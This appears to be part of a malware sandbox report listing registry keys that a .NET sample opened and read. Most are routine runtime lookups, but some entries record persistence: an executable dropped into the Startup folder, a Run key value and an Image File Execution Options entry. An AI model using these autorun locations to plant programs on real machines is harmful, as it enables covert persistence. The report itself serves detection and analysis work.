HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\30bc7c4f\3f50fe4f\88\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\3cca06a0\6dc7d4c0\7b\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Xml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Deployment__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Deployment,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.Accessibility__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Accessibility,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\.NETFramework\Policy\APTCA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.8.0.Microsoft.VisualBasic__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\Microsoft.VisualBasic,8.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Web__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Web,2.0.0.0,,b03f5f7f11d50a3a,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Management__b03f5f7f11d50a3a
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Remoting__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Runtime.Remoting,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6c3a5a24\4bca598b
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|fb.exe
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|fb.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Local|Temp|fb.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\Global
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\Global
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6c3a5a24\3ac68cee
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy\Enabled
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it-IT_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\40dcb014
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.mscorlib.resources_it_b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5e8c75c\1ffc8ca7
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\4ad60644\6f323003
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\235dd0a9
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\5d1b2185\9e47f51
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System
HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\EnableExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun
HKEY_CURRENT_USER\Software\Microsoft\Command Processor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar
HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\Alternate Sorts
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Language Groups
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ncvmxzo.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Managed\S-1-5-21-1822907384-1282624486-319450072-1000\Installer\Assemblies\C:|Users|Seven01|AppData|Roaming|Microsoft|Windows|Start Menu|Programs|Startup|ncvmxzo.exe
HKEY_CURRENT_USER\Software\Microsoft\Installer\Assemblies\C:|Users|Seven01|AppData|Roaming|Microsoft|Windows|Start Menu|Programs|Startup|ncvmxzo.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Installer\Assemblies\C:|Users|Seven01|AppData|Roaming|Microsoft|Windows|Start Menu|Programs|Startup|ncvmxzo.exe
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\6faf58\19ab8d57\86\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Data.SqlXml__b77a5c561934e089
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\System.Data.SqlXml,2.0.0.0,,b77a5c561934e089,MSIL
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\ncvmxzoureascvnz

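Read Keys
(Most entries below are lookups the .NET Framework 2.0 loader makes for any managed program: Fusion, NativeImagesIndex, GACChangeNotification. The sample-specific entry is the Run value at the end of the list.)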

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index149\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\61e7e666\c991064\7a\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85\Status
